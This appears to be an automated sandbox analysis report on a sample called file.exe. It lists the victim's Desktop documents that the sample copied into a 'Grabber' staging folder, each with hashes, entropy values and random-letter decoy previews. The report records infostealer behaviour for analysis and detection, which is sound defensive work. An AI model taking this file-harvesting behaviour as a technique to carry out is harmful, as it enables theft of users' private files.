                                                                                                                                                            Preview:BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\QFAPOWPAFG\HQJBRDYKDE.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\QFAPOWPAFG\LHEPQPGEWF.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694579526837108
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
                                                                                                                                                            MD5:2DB1C5AA015E3F413D41884AC02B89BC
                                                                                                                                                            SHA1:4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
                                                                                                                                                            SHA-256:956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
                                                                                                                                                            SHA-512:C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\QFAPOWPAFG\NIRMEKAMZH.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694574194309462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                            MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                            SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                            SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                            SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\QFAPOWPAFG\QFAPOWPAFG.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.690474000177721
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
                                                                                                                                                            MD5:A01E6B89B2F69F2DA25CB28751A6261C
                                                                                                                                                            SHA1:48C11C0BECEB053F3DB16EC43135B20360E77E9B
                                                                                                                                                            SHA-256:0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
                                                                                                                                                            SHA-512:1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview:QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\SNIPGPPREP.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701796197804446
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                            MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                            SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                            SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                            SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\SNIPGPPREP.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701796197804446
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                            MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                            SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                            SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                            SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\SNIPGPPREP\GNLQNHOLWB.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.698695541849584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
                                                                                                                                                            MD5:64E7020B0B401F75D3061A1917D99E04
                                                                                                                                                            SHA1:785E09A2F76464E26CE282F41DE07D1B27FFB855
                                                                                                                                                            SHA-256:9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
                                                                                                                                                            SHA-512:14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview:GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\SNIPGPPREP\LHEPQPGEWF.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694579526837108
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
                                                                                                                                                            MD5:2DB1C5AA015E3F413D41884AC02B89BC
                                                                                                                                                            SHA1:4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
                                                                                                                                                            SHA-256:956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
                                                                                                                                                            SHA-512:C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\SNIPGPPREP\PWZOQIFCAN.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.695900624002646
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:55kzf0ILfo2TdftHFyQ9yi5pS2+w9gHtKgqin5q+GzA0Kb08Vb5nY1NLIeukWg/w:56zcILlTxtX9j5TijGzVURS5IBgSGVny
                                                                                                                                                            MD5:BC4419B8B9970FEDCD704610C64179B0
                                                                                                                                                            SHA1:71BD107584E1CFC5E5E75F765C064FC13228BC96
                                                                                                                                                            SHA-256:A2115F382834559DCAB7139CB455FEFBEBBF07B89E2B4B8CFA3DC152491DAC1F
                                                                                                                                                            SHA-512:454E3C24F975C0F56F152D24D32C544918CC7663B01CC50C717FAD082B201D4265DA9C5808AFA58573BC104AB739330AEAD49156FA7E7419B3D7CE130EAF3142
                                                                                                                                                            Malicious:false
